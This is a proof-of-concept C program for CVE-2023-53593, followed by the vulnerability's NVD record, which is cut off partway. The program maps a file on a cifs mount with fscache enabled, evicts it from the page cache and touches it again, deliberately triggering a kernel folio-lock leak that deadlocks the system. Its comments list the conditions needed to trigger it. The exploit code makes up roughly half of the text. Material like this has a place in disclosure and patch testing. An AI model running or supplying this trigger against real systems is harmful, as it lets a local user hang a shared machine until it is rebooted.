CVE-2023-53593

// PoC for CVE-2023-53593 - Linux kernel cifs fscache folio lock leak // This PoC demonstrates how to trigger the deadlock condition #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <fcntl.h> #include <sys/mman.h> #include <sys/stat.h> #define FILE_SIZE (4096 * 10) // 10 pages #define PAGE_SIZE 4096 int main(int argc, char *argv[]) { if (argc != 2) { fprintf(stderr, "Usage: %s <cifs_mounted_file>\n", argv[0]); fprintf(stderr, "Note: Requires cifs mount with fscache enabled\n"); return 1; } const char *filepath = argv[1]; int fd; void *mapped; // Step 1: Open the file on a cifs mount with fscache enabled fd = open(filepath, O_RDONLY); if (fd < 0) { perror("open"); return 1; } // Step 2: mmap the file to trigger filemap_fault path mapped = mmap(NULL, FILE_SIZE, PROT_READ, MAP_PRIVATE, fd, 0); if (mapped == MAP_FAILED) { perror("mmap"); close(fd); return 1; } // Step 3: First read - triggers cifs_readpage_worker with fscache miss // This populates the fscache printf("First access (fscache miss) - reading page...\n"); volatile char c = ((char *)mapped)[0]; (void)c; // Step 4: Drop the page from page cache to force fscache re-fetch // On next access, fscache hit occurs, triggering the bug printf("Dropping page cache to force fscache hit on next access...\n"); if (posix_fadvise(fd, 0, FILE_SIZE, POSIX_FADV_DONTNEED) != 0) { perror("posix_fadvise"); } // Step 5: Second access via mmap - triggers fscache cache hit // This is where the folio lock leak occurs printf("Second access (fscache hit) - this triggers the lock leak...\n"); // Touch the page to trigger filemap_fault -> filemap_read_folio c = ((char *)mapped)[0]; (void)c; // Step 6: Third access - the page is now locked, causing deadlock printf("Third access - system may hang here due to deadlock...\n"); c = ((char *)mapped)[0]; (void)c; printf("If you see this, the bug was not triggered.\n"); munmap(mapped, FILE_SIZE); close(fd); return 0; } /* * Trigger conditions: * 1. Linux kernel with cifs module compiled with fscache support * 2. A cifs filesystem mounted with -o fsc (fscache enabled) * 3. Local user access to files on the cifs mount * 4. File must be read at least once (to populate fscache) * 5. Page cache must be evicted (fscache hit on re-read) * 6. Subsequent mmap access will deadlock * * To mount with fscache: * mount -t cifs -o fsc,username=user,password=pass //server/share /mnt/cifs * * After triggering, check the stuck task: * cat /proc/<pid>/task/<tid>/stack * Expected output shows deadlock in folio_wait_bit_common */

{"cve": {"id": "CVE-2023-53593", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T16:15:55.790", "lastModified": "2026-03-21T00:51:33.560", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ncifs: Release folio lock on fscache read hit.\n\nUnder the current code, when cifs_readpage_worker is called, the call\ncontract is that the callee should unlock the page. This is documented\nin the read_folio section of Documentation/filesystems/vfs.rst as:\n\n> The filesystem should unlock the folio once the read has completed,\n> whether it was successful or not.\n\nWithout this change, when fscache is in use and cache hit occurs during\na read, the page lock is leaked, producing the following stack on\nsubsequent reads (via mmap) to the page:\n\n$ cat /proc/3890/task/12864/stack\n[<0>] folio_wait_bit_common+0x124/0x350\n[<0>] filemap_read_folio+0xad/0xf0\n[<0>] filemap_fault+0x8b1/0xab0\n[<0>] __do_fault+0x39/0x150\n[<0>] do_fault+0x25c/0x3e0\n[<0>] __handle_mm_fault+0x6ca/0xc70\n[<0>] handle_mm_fault+0xe9/0x350\n[<0>] do_user_addr_fault+0x225/0x6c0\n[<0>] exc_page_fault+0x84/0x1b0\n[<0>] asm_exc_page_fault+0x27/0x30\n\nThis requires a reboot to resolve; it is a deadlock.\n\nNote however that the call to cifs_readpage_from_fscache does mark the\npage clean, but does not free the folio lock. This happens in\n__cifs_readpage_from_fscache on success. Releasing the lock at that\npoint however is not appropriate as cifs_readahead also calls\ncifs_readpage_from_fscache and *does* unconditionally release the lock\nafter its return. This change therefore effectively makes\ncifs_readpage_worker work like cifs_readahead."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.17.1", "versionEndExcluding": "6.1.47", "matchCriteriaId": "8A6CCC67-4017-438A-87FF-B1AF5B87C2A8"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.4.12", "matchCriteriaId": "CF8ECF64-40AE-49AB-8315-4D83F9F56ECF"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:5.17:-:*:*:*:*:*:*", "matchCriteriaId": "A59F7FD3-F505-48BD-8875-F07A33F42F6C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:5.17:rc3:*:*:*:*:*:*", "matchCriteriaId": "C030FA3D-03F4-4FB9-9DBF-D08E5CAC51AA"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:5.17:rc4:*:*:*:*:*:*", "matchCriteriaId": "B2D2677C-5389-4AE9-869D-0F881E80D923"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:5.17:rc5:*:*:*:*:*:*", "matchCriteriaId": "EFA3917C-C322-4D92-912D-ECE45B2E7416"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:5.17:rc6:*:*:*:*:*:*", "matchCriteriaId": "BED18363-5ABC-4639-8BBA-68E771E5BB3F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:5.17:rc7:*:*:*:*:*:*", "matchCriteriaId": "7F635F96-FA0A-4769-ADE8-232B3AC9116D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:5.17:rc8:*:*:*:*:*:*", "matchCriteriaId": "FD39FE73-2A9D-4C92-AE7A-CA22F84B228D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.5:rc1:*:*:*:*:*:*", "matchCriteriaId": "0B3E6E4D-E24E-4630-B00C-8C9901C597B0"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.5:rc2:*:*:*:*:*:*", "matchCriteriaId": "E4A01A71-0F09-4DB2-A02F-7EFFBE27C98D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.5:rc3:*:*:*:*:*:*", "matchCriteriaId": "F5608371-157A-4318-8A2E-4104C3467EA1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.5:rc4:*:*:*:*:*:*", "matchCriteriaId": "2226A776-DF8C-49E0-A030-0A7853BB018A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.5:rc5:*:*:*:*:*:*", "matchCriteriaId": "6F15C659-DF06-455A-9765-0E6DE920F29A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.5:rc6:*:*:*:*:*:*", "matchCriteriaId": "5B1C14ED-ABC4-41D3-8D9C-D38C6A65B4DE"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/69513dd669e243928f7450893190915a88f84a2b", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/7a9fb689c1a1dc3738 ... (truncated)